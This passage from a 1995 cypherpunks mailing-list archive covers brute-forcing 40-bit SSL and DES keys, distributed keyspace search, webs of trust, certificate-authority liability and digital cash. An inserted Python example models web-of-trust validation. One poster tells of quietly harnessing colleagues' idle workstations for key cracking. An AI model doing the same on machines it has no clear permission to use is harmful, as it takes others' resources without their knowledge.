I wrote earlier:

[..]
: : Orlando, Fla., August 20 (AP) -- Two explosives were
: : planted in a professor's suitcase to test airport
: : security measures in Amsterdam, The Netherlands, and were
: : discovered when he arrived in Orlando, officials said
: : Saturday.

: [..]
: : Kensel said such security measures were normal for
: : Europe.

: : "Particularly in Europe, there are grave concerns about
: : security issues," he said. "As a result, they do conduct
: : various security programs regularly. This was part of a
: : routine check of their own security systems.

: : "The bag got away from them basically," he said.


: Airport police was very quick to point out that such practices
: were legal, now when they do that ......

The Dutch Department of Justice stated that there was no legal
basis for such practises, Airport Police are forbidden to use
'innocent travelers' as decoy.

--
Alex de Joode
Fear Uncertainty Confusion and Kaos, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (Ted Byfield)
Date: Tue, 22 Aug 95 02:19:21 PDT
To: cypherpunks@toad.com
Subject: Re: DES & RC4-48 Challenges
Message-ID: <v02120d00ac5f122a84c7@[166.84.253.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:52 PM 8/21/95, Timothy C. May wrote:

>Call it a factor of "only" 6000 times harder than the SSL challenge. Hard
>to imagine this happening in the next two years.
>
>Maybe if much of the Net community was energized to run DES crackers
>instead of Flying Toasters, but a hard effort to organize...for fleeting
>reward.

        Given the rate at which news of the prior cracks seems to have
spread among people quite new to these questions, I think you'd be
surprised: I've heard mention of it from no less than ten people who, to my
knowledge, had never before taken any interest whatsoever in crypto
questions. Granted, ten people a-laboring away on Pentiums and PPCs ain't
much--but, who knows?, my experience might just scale quite well.
        Yes, I know: Life is short and art is long. Still, I think it's
worth a try: failure seems likely and success remote, but how much sweeter
victory if the project were to succeed.
        The key, I think, would lie in making participation in the project
extremely accessible: developing simple platform-specific apps that'd make
sweeping space nearly idiot-proof. If joe.anne.net could DL an app
appropriate to hir platform then fill out a field in a web page that would
delegate keyspace according to the question "I can let my [platform] run
for [n] hours," and easily report back the results, the response might be
quite strong. How long it would take to succeed, _if_ it did, is anyone's
guess: it could be a day or a decade.
        Obviously, the preparation would be labor-intensive; the
trade-off, a good one imho, is that this labor having been performed, the
reservoir of potential contributors would expand manifold. If we could
increase the reservoir by a factor of 1000, which isn't at all unlikely,
that advance would be nothing to sneeze at.
        Cracking something that for now seems beyond reach would up the
ante in a pretty big way, and would put that much more pressure on
policymakers to jack that bit-limit up. And that's exactly what we want.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Tue, 22 Aug 95 09:27:02 PDT
To: cypherpunks@toad.com
Subject: Re: DES & RC4-48 Challenges
In-Reply-To: <v02120d00ac5f122a84c7@[166.84.253.144]>
Message-ID: <199508221626.JAA10063@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain



[stuff about running crypto screensavers]

It seems like there's got to be an easy way to divvy up keyspace on a
real time basis so that anyone with a few cycles to spare can
contribute them...

There could be a central server out there, which would keep track of
what keyspace needs to be swept, etc.

Then, clients (available as Mac, DOS, Windows*, UNIX,
etc. screensavers) could, whenever possible, connect to the server,
get a bit of keyspace, and start checking.

The client would tell the server how fast it is (chip and speed), and,
optionally, an estimation of how much time it will have free.  The
server finds some unchecked keyspace and allocates the range.  Then,
when the screensaver ends (when the user starts working again), it
would check in and tell the server how much of the space it checked.

The server could implement multiple passes of the keyspace to cope
with untrusted clients, etc.

Or something like that, anyhow.

The point is, the keyspace should be divided on a spare-cycle basis,
so that people who happen to have some extra, unused time on a
workstation can help without having to follow this list religiously,
and without having to commit to checking a certain amount of keyspace
beforehand.

This really is a nifty concept, and I think a *lot* of people would be
interested in running crypto-cracking screensavers.

--sq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Tue, 22 Aug 95 09:31:26 PDT
To: cypherpunks@toad.com
Subject: Any code for getting noise from PC & Mac sound card?
Message-ID: <9507228091.AA809109019@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        I am looking for an example of software that extracts unpredictable
bits from the sound cards of PCs and MACs.  Has anyone written software
like this?  Can someone send me a URL to it?  Thanks,
                --Bob Baldwin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 09:18:43 PDT
To: patl@lcs.mit.edu
Subject: Re: True Names and Webs of Trust
Message-ID: <ac5f51e317021004ef44@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:46 PM 8/22/95, Patrick J. LoPresti wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
> tcmay> As Bill Stewart correctly claimed is my view, the "key is the
> tcmay> identity."  Or, more accurately, a _persistent persona_ is
> tcmay> what matters.
>
>These discussions are missing the entire point of the Web of Trust.
>
>Key signatures exist for one reason and one reason only: To thwart
>man-in-the-middle attacks.  Whether your "persistent persona" is a
>True Name (tm) or a pseudonym is irrelevant.

But this is exactly what a persistent persona is. Not a True Name, but a
keyholder who has not been spoofed by some other agent or entity.

End to end.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 22 Aug 95 07:12:08 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508220140.TAA12229@nagina.cs.colorado.edu>
Message-ID: <199508221411.KAA00910@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "wilcoxb" == Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:

 >> Yes, I've been remiss.  It's an old belief -- that signing is
 >> expensive.  Now that I'm using emacs extensions and RMAIL, it's
 >> really easy -- but I still follow the old habit.

 wilcoxb> I have a pretty easy-to-use set-up...

Probably not as easy as Carl's.

 wilcoxb> Not to seem picky or anything, but now that I have a
 wilcoxb> clearsigned message from you, I need your public key in
 wilcoxb> order to verify it.  :-)

Assuming Carl is using Mailcrypt under Emacs (as he suggests above),
then he doesn't have the same problem.  When the signature fails to
verify for lack of a key, Mailcrypt will parse the PGP output and
offer to fetch the needed key automatically (and instantly) via HTTP
to the keyservers.

But then, Emacs only runs on "ghettoized" operating systems like Unix,
VMS, OS/2, and Windows 95...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDnljnr7ES8bepftAQEFLwP/b9TE5QphAhJl1PyhdAsbyE3Vx58TuwGD
dAJf2fpThN9wYgQ3b0K+QxYbLVcQTbof5v8/AvYyM32JrsEzRQXZmjguoOT0BnLz
gjxTS5qLhOmcOhbUc6G3iEPQTuusWU59PPqp1TYPkZ0zVopDvPjay2O60whl4t/a
bARjHknf+es=
=bAX+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 21 Aug 95 17:27:59 PDT
To: cypherpunks@toad.com
Subject: Doing the SSL challenge
Message-ID: <Pine.SOL.3.91.950822091322.17350B-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Boy, go away for a week's holidays and everyone else has all the fun :-).

Just a few quick rambles about my searching of the top half of the key 
space in the first SSL challenge, please ignore if you are sick of this 
thread.

All these estimates of the cost in CPU time are a bit silly.  I started 
out using a few of our bigger machines at work but when people noticed I 
just stopped using them.  My main workhorse machines 
became desktop boxes that nobody used at night.  Quite a bit of my 
%50 keyspace was done by 5 dual processor sparc 20's that people around 
me had on their desktops.  Most of the rest was done by about 50 486's 
that I rsh'ed to each night (I just tried to rsh to every Solaris/x86 box 
in the company :-).  Out of a company of about 300 people, about 
2 (who did not know about my attempt on the challenge) asked me about this 
processing and what was I actually doing, no-one else really noticed :-).

I was making no particular effort to use every machine I could but I was 
still able to do about %2.5 of the key space each 12 hour night and %12.5 
each weekend.  If I made a real effort to harness the compute power at my 
work I would have probably been able to run at twice this rate but that 
would have required work on my part, a lot more people would have noticed 
and it would have had an impact on people doing real work.  The way I was 
searching had no impact.

I will also say that screen-savers running on the above mentioned 486's 
were a real pain, perhaps we will change xlock so they can only run the 
blank screen :-).

I personally feel that using mas-pars is cheating a bit :-).  People are 
aware that something is going on when a machine that big is grunting away 
all weekend :-).  There is so much CPU sitting on people's desktops that 
is just unused that there is very little need to use the big central boxes.

The relative speed on some of the machines I used is as follows (per CPU 
is in brackets)
6 CPU SGI challenge     37 (6.1)  5 (1.6)
2 CPU sparc 20          7  (3.5)  1
1 CPU 486 DX50          1

I could never really get more than 1/2 the SGI 
but I could always get 5 sparc 20's and 50+ 486's without anyone noticing.
So I was getting the 2.5 6CPU SGI challenge's from idle machines on 
people's desks.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 10:00:16 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <ac5f582e1902100469ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:01 PM 8/22/95, Robert Hettinga wrote:

>Obviously, we aren't talking about the end of bookkeeping as we know it
>(BAWKI? ;-), but it does mean that days of book-entry as a means of social
>control are numbered.

A good essay. Too long for me to quote and discuss, though.

I worry about our--or at least my, speaking for myself--terminology.
Consider these variations on the same theme:

cash <--> immediate clearing <--> tokens <--> certificates

vs.

checks <--> delayed clearing <--> account-based systems


(I'm using "<-->" as my own symbol to mean "related to.")

Chaum has been harping on this exact distinction in public talks. I at
first thought he was beating a dead horse, but I now see that most people
just don't get it. (I don't mean people on our list, I mean journalists and
writers about "digital money.")

Marvin Minsky once said the history of AI is the history of grad students
and researchers giving new names to old ideas. (Ironically, Minsky did this
in spades when he took the ideas of "object-oriented programming" and
invented the term "frame-based systems" to cover the same ground!)

One hope I have for the "class library" approach, whether implemented in
C++, Java, Smalltalk, etc., is that these terms and concepts will be
reified in code, with browsable definitions and examples.

The "financial instruments" people have been working on this "ontology of
money" for a long time. I have long been surprised that the crypto and
financial communities have little overlap.

No, I don't mean you folks are not bridging both worlds. And I don't mean
the banking and finance industry is not working on incorporating more
crypto. I mean that the "Crypto" conferences have very little stuff being
published on finance and money, save for the Chaum stuff.

The interesting stuff for me lies in the intersection of:

Crypto + Game Theory + Economics


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 21 Aug 95 17:51:03 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
In-Reply-To: <9508211902.AA19391@couchey.inria.fr>
Message-ID: <Pine.SOL.3.91.950822102640.19364A-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Damien Doligez wrote:
> >From: altitude@cic.net (Alex Tang)
> >It seems that one of the problems with Damien's
> >cracking job was that it  was "not sanctioned".
>
> Actually, INRIA's PR people are quite pleased with the publicity.
> They asked me to prepare an official press release to counteract the
> Wall Street Journal's "evil hacker" story, which was unfortunately
> reprinted by some papers.  The Herald Tribune is particularly bad in
> this respect.

Yes, this is all quite silly.  For my part, I've implemented SSL on my 
work machines (in my own time) and released it under my own copyright
and my bosses don't mind (mind you, I'm not trying to make money from the 
code).  I've participated in trying to break the 40bit 
key on work machines (using only idle machines) and they don't mind.  
I've run network raytracing programs (using only idle machines) and they 
don't mind.  Most places of work give employees quite a bit of latitude 
as long as they don't do things that reflect badly on the company and if it 
generates publicity that is positive they don't mind.  If Joe Bloggs who 
works at Widgets Inc gets mentioned in the paper, that's free publicity 
for Widgets Inc and indicates that Widgets Inc may have someone with 
some brain cells working for them (depending if they call Joe Bloggs an 
'evil hacker' or not :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 22 Aug 95 10:13:14 PDT
To: cypherpunks@toad.com
Subject: Re: True Names and Webs of Trust
Message-ID: <ac5f5e401b021004d6d0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:38 PM 8/22/95, Rich Salz wrote:
>> This has relevance to the thread Michael Froomkin raised, as well. To wit,
>> none of the people I've met has been "certified." And yet it doesn't bother
>> me.
>
>Just because you haven't been able to easily do it yet, nor found it useful,
>is no reason not to let new technology provide this service to you.

I wasn't saying I wouldn't let new technology provide this service for me.

I was just saying that lack of it has not been a problem, so far. In very
few of my dealings, even in the economic world, have I needed to have any
kind of certification.

(Buying a new house recently is where I needed certification of inspectors,
escrow agents, title companies, etc.)

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Tue, 22 Aug 95 07:47:03 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: True Names and Webs of Trust
In-Reply-To: <ac5ebdaa140210041c80@[205.199.118.202]>
Message-ID: <199508221446.KAA00931@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

 tcmay> As Bill Stewart correctly claimed is my view, the "key is the
 tcmay> identity."  Or, more accurately, a _persistent persona_ is
 tcmay> what matters.

These discussions are missing the entire point of the Web of Trust.

Key signatures exist for one reason and one reason only: To thwart
man-in-the-middle attacks.  Whether your "persistent persona" is a
True Name (tm) or a pseudonym is irrelevant.

Suppose a sysadmin on your site installed a filter on your mail and
news that translated everything between your real public key and one
of her choosing.  Such a transformation could be done automatically
quite easily.  How long before you would notice?  Depending on how
careful you are, it could take quite a while.

Key signatures avoid this attack.  What a key signature *means* is
that the signer is personally vouching that no such attack has taken
place.  Each signer has his own level of paranoia, and you need some
knowledge of that paranoia level to evaluate the worth of a signature.

Requiring a True Name backed by state-approved photo ID is a pretty
high level of paranoia.  (It would take a lot of effort to monitor
this exchange, edit it to arrange a meeting between us, show up with
photo ID for "Tim May", and continue editing every time one of us
mentioned our personal meeting...)

Pseudonyms *do* pose a problem here.  The problem is not whether
someone tries to use a name that "really" belongs to someone else.
Who cares?  The problem is making sure that your conversation with the
entity at the other end of the wire is secure.

This is what the Web of Trust provides.  If I take the time to have a
long conversation with a pseudonym (so that I "get to know him"), then
I arrange a personal or telephone meeting, and the person I talk to is
totally consistent with the person I know electronically, then I can
feel safe signing his key.  ("The entity calling itself 'Patrick J.
LoPresti' asserts that the entity it knows as 'John Doe' uses this
public key.") Of course, I need to know him pretty well before I can
do this, lest the man-in-the-middle deceive us.  The beauty of the Web
of Trust is that once I have done this, everyone else who trusts me
can use the pseudo's key with confidence and without going through the
same trouble.

Zimmermann clearly understood all of this, but I don't think he
documented it properly.  In my opinion, everyone should always think
in terms of man-in-the-middle attacks when signing a public key.
Mandating "True Names" is just an overconservative approach suitable
for people who don't fully understand the issue.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMDntwHr7ES8bepftAQFyyAQAnFtDh4UxHOtFoykCFVyK4s0CXqXhku+k
T8n/881R0F1lL+qKMlkxCd0qRmYXueeYGCO6oXAMWgVjVBQ4PluAdw7Ad4b9GxDA
FzkuN5oasKbyKyyCRguRq7DszKWW0nyjGbsToq0udtX0fsY33ZtU3btbsjawBFgI
Kk7TEeHBT+8=
=pndj
-----END PGP SIGNATURE-----
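
[Added example, not part of the message above and not PGP's own code: a small model of how a keyring decides whether to accept a "user ID uses this key" binding, showing that a key swapped in by a mail filter is rejected because no trusted introducer vouches for it. The names, the constructed key bytes, the thresholds and the fingerprint scheme are assumptions of this example, and each certification's signature is assumed to have been verified already.]

```python
import hashlib
from dataclasses import dataclass

# Owner-trust levels: how much weight I give a signer's vouching, i.e. what
# I know about that signer's "paranoia level".
UNTRUSTED, MARGINAL, COMPLETE = 0, 1, 2
COMPLETES_NEEDED = 1   # assumption of this example
MARGINALS_NEEDED = 2   # assumption of this example
MAX_DEPTH = 3          # assumption: longest chain of introducers accepted


def fingerprint(key_material: bytes) -> str:
    """Short stable identifier for a public key (constructed scheme)."""
    return hashlib.sha256(key_material).hexdigest()[:16]


@dataclass(frozen=True)
class Certification:
    """'signer asserts that user_id uses the key with fingerprint key_fpr'.
    Assumption: the signature on this record was already verified."""
    signer_fpr: str
    user_id: str
    key_fpr: str


class Keyring:
    def __init__(self, my_key: bytes):
        self.my_fpr = fingerprint(my_key)
        self.owner_trust = {self.my_fpr: COMPLETE}
        self.certs = set()  # a set, so a repeated certification counts once

    def certify(self, signer_key: bytes, user_id: str, subject_key: bytes):
        self.certs.add(Certification(fingerprint(signer_key), user_id,
                                     fingerprint(subject_key)))

    def trust(self, key: bytes, level: int):
        self.owner_trust[fingerprint(key)] = level

    def valid_bindings(self) -> set:
        """All (user_id, key_fpr) bindings reachable from my own key."""
        valid_keys = {self.my_fpr}
        bindings = set()
        for _ in range(MAX_DEPTH):
            tally = {}  # binding -> [complete votes, marginal votes]
            for c in self.certs:
                level = self.owner_trust.get(c.signer_fpr, UNTRUSTED)
                # A vote counts only if the signer's own key is validated
                # AND I trust that signer as an introducer.
                if c.signer_fpr not in valid_keys or level == UNTRUSTED:
                    continue
                votes = tally.setdefault((c.user_id, c.key_fpr), [0, 0])
                votes[0 if level == COMPLETE else 1] += 1
            found = {b for b, (comp, marg) in tally.items()
                     if comp >= COMPLETES_NEEDED or marg >= MARGINALS_NEEDED}
            if found <= bindings:
                break  # fixpoint reached
            bindings |= found
            valid_keys |= {fpr for _, fpr in found}
        return bindings

    def accepts(self, user_id: str, key_material: bytes) -> bool:
        return (user_id, fingerprint(key_material)) in self.valid_bindings()


def build_demo():
    """Constructed scenario: every key below is a made-up byte string."""
    keys = {name: f"key:{name}".encode() for name in
            ("me", "carol", "dave", "erin", "john_real", "john_fake",
             "sockpuppet", "jane")}
    ring = Keyring(keys["me"])
    # Keys I checked in person, with my view of each signer's care.
    for name, level in (("carol", COMPLETE), ("dave", MARGINAL),
                        ("erin", MARGINAL)):
        ring.certify(keys["me"], name, keys[name])
        ring.trust(keys[name], level)
    # Carol got to know the pseudonym and signed its real key.
    ring.certify(keys["carol"], "John Doe", keys["john_real"])
    # Only one marginal introducer vouches for Jane Roe so far.
    ring.certify(keys["dave"], "Jane Roe", keys["jane"])
    # The filter's substitute key arrives self-signed and signed by a
    # second key the filter operator controls.
    ring.certify(keys["john_fake"], "John Doe", keys["john_fake"])
    ring.certify(keys["sockpuppet"], "John Doe", keys["john_fake"])
    return ring, keys


if __name__ == "__main__":
    ring, keys = build_demo()
    for uid, k in (("John Doe", "john_real"), ("John Doe", "john_fake"),
                   ("Jane Roe", "jane")):
        verdict = "accept" if ring.accepts(uid, keys[k]) else "reject"
        print(f"{uid:9} {k:10} {verdict}")
```
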




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Tue, 22 Aug 95 08:19:01 PDT
To: cypherpunks@toad.com
Subject: Re: Partial Key Escrow
In-Reply-To: <Pine.PMDF.3.91.950821214634.620943633A-100000@umiami.ir.miami.edu>
Message-ID: <kkCSvLKSMUw8M93fZt@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin <mfroomki@umiami.ir.miami.edu> writes:
> A disadvantage of this ingenious proposal is that it makes it
> even more difficult to spot rogue key-cracking efforts.  If you are an
> honest government employee and you come across a key cracking program
> today, and you work for a domestic TLA you know something funny is going
> on.  "Just routine" will be line henceforth...

Yeah, but that _doesn't matter_.
The domestic TLA can't afford to embark on massive, wholesale fixing
expeditions this way, even _with_ the escrowed part.  The point is to
fix the unescrowed part at such a size that they can afford to crack a
limited number of keys in a reasonable interval.  Say, at a cost of
about $10000 / key.  That's peanuts for an OKBomb or WTC bomb case,
but it gets to be expensive (hard to hide the expense) if you're
fishing for dirt on members of the opposition party, or investigating
14 year-old Black Panthers.

It also suggests some interesting (and admittedly, abusable) TV shows.
"type this number into your ``America's Most Wanted'' official Screen
Saver key finder..."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Tue, 22 Aug 95 20:15:27 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508220238.TAA22713@ix5.ix.netcom.com>
Message-ID: <Pine.PMDF.3.91.950822111352.623139004A-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Bill Stewart wrote:

> can be substantial even if the suit is bogus.)  Under what conditions do
> you expect somebody to sue a CA?

CA certifies key saying that holder has corporate power to enter into 
deals up to $1million.  Keyholder commits fraud, arguably outside 
corporate powers.

CA certifies you are Jack Ripper based on phony id.  In fact you are Sam 
Spade.  CA sued for recovery of ensuing fraud.

CA certifies that a document is authentic and time-stamps it.  Lawyers 
did not do due diligence, books were cooked, everyone who touches 
document gets sued.

In each of these cases, if the CA did exactly what it promises and no 
more, it (arguably) deserves a way to short-circuit the suit, thus 
keeping its costs down.

Since (in the absence of any rules given the newness of the technology) it
is very likely that a rich CA would get nuisance suits every time a deal
in which it participated went sour, the absence of rules will either 
raise costs CAs have to charge (e.g. to buy insurance) or will keep rich 
folk out of the industry (which isn't good either, since you want CAs to 
buy security and to last).  Thus the need for clear liability rules.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 23 Aug 95 11:50:14 PDT
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508220238.TAA22713@ix5.ix.netcom.com>
Message-ID: <199508231824.LAA24781@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 21 Aug 1995, Bill Stewart wrote:

> can be substantial even if the suit is bogus.)  Under what conditions do
> you expect somebody to sue a CA?

CA certifies key saying that holder has corporate power to enter into 
deals up to $1million.  Keyholder commits fraud, arguably outside 
corporate powers.

CA certifies you are Jack Ripper based on phony id.  In fact you are Sam 
Spade.  CA sued for recovery of ensuing fraud.

CA certifies that a document is authentic and time-stamps it.  Lawyers 
did not do due diligence, books were cooked, everyone who touches 
document gets sued.

In each of these cases, if the CA did exactly what it promises and no 
more, it (arguably) deserves a way to short-circuit the suit, thus 
keeping its costs down.

Since (in the absence of any rules given the newness of the technology) it
is very likely that a rich CA would get nuisance suits every time a deal
in which it participated went sour, the absence of rules will either 
raise costs CAs have to charge (e.g. to buy insurance) or will keep rich 
folk out of the industry (which isn't good either, since you want CAs to 
buy security and to last).  Thus the need for clear liability rules.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 22 Aug 95 09:02:00 PDT
To: cypherpunks@toad.com
Subject: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d04ac5f7d30410f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:30 AM 8/22/95, Timothy C. May wrote:
> (An important point is that
>in a cash economy, identity is almost irrelevant. It's only in non-cash, or
>"account-based," economy that True Names are demanded. Lots of interesting
>issues to discuss here, which I won't now.)

I'd like to vamp on this for a while.

I think Tim's talking about what I call the book-entry/certificate
distinction.  It goes right to the heart of finance, and it's why I think
that the strong crypto/Moore's law combination is going to do more to free
people than any political system ever could.  (How's that for a wind-up to
a rant?)

Accounting, well, double-entry bookkeeping anyway, was invented in the late
middle ages so people could measure their financial progress, but most
importantly, so that people could trust other people doing the measurement
for them: their bookkeepers.  This allowed the Renaissance entrepreneur (or
more originally an Italian nobleman, who was more of a gangster than
anything else) to delegate financial measurement and consequently build a
much larger enterprise than he could have otherwise.

Before double-entry bookkeeping, the first book-entry system, everything was
done on a cash, or certificate, basis, and, like the apocryphal Silicon
Valley entrepreneur's bedroom shoebox, you knew you were making money when
there was more in the till today than there was yesterday. The first
certificates were actually the first form of writing: the original
Cuneiform(sp?) of the Babylonians actually evolved from little pieces of
clay formed into interesting three-dimensional polygons with a signature
seal stamped on them, certificates, or abstractions of value, like "3 cows,
so says I, J. Nebbuchenezzar", these were, in turn, used like money.

Book-entry allowed the creation of larger and larger enterprises, and it's
no surprise that a hundred years or so after the invention of double entry
bookkeeping, joint stock companies, and eventually limited liability, came
into being.  The paradox here was that this was an inherently
certificate-based system. People met in front of a buttonwood tree on Wall
Street, and traded ornately engraved certificates representing some
fractional amount of a company's shares or debt outstanding. To trade your
shares, you had to physically send them to Wall Street to have them traded
for you.

Eventually book-entry systems got into the trading of securities when stock
exchanges were founded. Specialists or market-makers would take your order,
and cross them on their books with their own inventory or with people on
the other side of the trade, or, in the commodities markets where the trade
volume is much higher, people stand around a pit, execute the trade with a
contra party, and sign each other's orders.

This was compounded enormously by the advent of faster communications,
particularly telecommunications.  People could trade their stock from
anywhere by wire, or by physically talking to a branch office of a
securities firm who was itself linked by wire to an exchange through its
main office.

In the early days of book-entry trading, delivery of physical certificates
was done at various traders' operations departments, called "cages" for
obvious reasons, to settle a trade.  After a while clearing houses were
instituted to do book-entry settlement of exchange-traded securities. In
fact, when someone says  "book-entry" these days, they usually mean
book-entry securities settlement.  A clearing house has all the physical
certificates in a vault, and keeps books as pointers to all that paper to
show who owns what. Those books match the books of the various traders, and
through the miracle of double-entry bookkeeping, everything balances so
everyone agrees with each other.  In fact, the need for all those
certificates sort of goes away in this system, and when I first got on this
list a year or so ago, Perry and I talked about the existence, at the
Depository Trust Company -- the New York Stock Exchange's clearinghouse --
of a single certificate representing a company's entire common stock.

Okay, so what does this have to do with strong crypto? A lot. Every once in
a while I've compared strong crypto and privacy to flight. Flying is an
inherent good for lots of people, but what makes it really economically
useful is how fast you go when you fly.  People buy airline tickets because
they can get anywhere much quicker if they fly than if they do anything
else.  The same with strong cryptography. Privacy, and the strong
cryptography which makes it possible, is an inherent good for most of us,
especially here on *this* list.  But cryptographically strong protocols
become economically useful when used for the creation of certificates which
abstract value: digital bearer certificates like digital cash, and
eventually digital certificates representing stocks, bonds, and various
derivative securities.

To understand why, we need to make one further digression. Remember all
those telecommunications lines going into the exchanges?  The inherent
geometry of a system where lines are cheaper than nodes is a hierarchy: you
pick up a phone to call someone, and your central office routes you up to
its central office, and further on up the hierarchy until the call can be
switched back down somewhere to complete the call. The interesting
correlation between this "switching" and most of our current social
structure can be left for another list, but the reason for this methodology
is all bound up in the economics of wires and switches: at first, wires
were cheaper than switches, who, in the beginning, were people.  We all
know the story from there, people were first replaced with electromechanical
switches, then with solid-state switches, then with microprocessing
switches. When we got microprocessors, the economics of the nodes/lines
problem got turned on its head. We run into Moore's Law.

Moore's Law, for Moore of Intel, is an observation that the price of a
given semiconductor falls by half every 12 months, though it was 18 months
when Moore figured this out.  From a cryptological perspective, we
understand what this means to the future cost of breaking a keyspace of a
certain size.  Moore's Law also means just as much to the structure of the
network: in collapsing the cost of a network's nodes, it converts it from a
hierarchy to a geodesic. Like Bucky Fuller's geodesic domes, a geodesic
network consists of nodes connected to an arbitrary number of lines, with
no real directionality to the motion of traffic: there is no up or down
like in a hierarchy. A message could originate at the node, or could be
just passing through in any direction to any other line the node is
connected to.  A good example of this is a company's PBX, which allowed
intra-company switching of phone calls for large organizations over long
distances directly, without going up and down the telephonic hierarchy.
The abolition of monopoly in the telephone system was primarily caused by
the advent of the geodesic network, and the phrase "Geodesic Network" was
the title of Peter Huber's analysis of the phone system for Judge Green,
the judge who broke up the Bell System in the early 80's.  Huber's
recommendation to Green in 1986 was to allow competition in the
Regional Bell Operating Companies' core markets: the local loop.  They're
just getting around to doing it almost 10 years later. Another consequence
of hierarchy, right?

Once again, the social consequences of geodesic information networks are
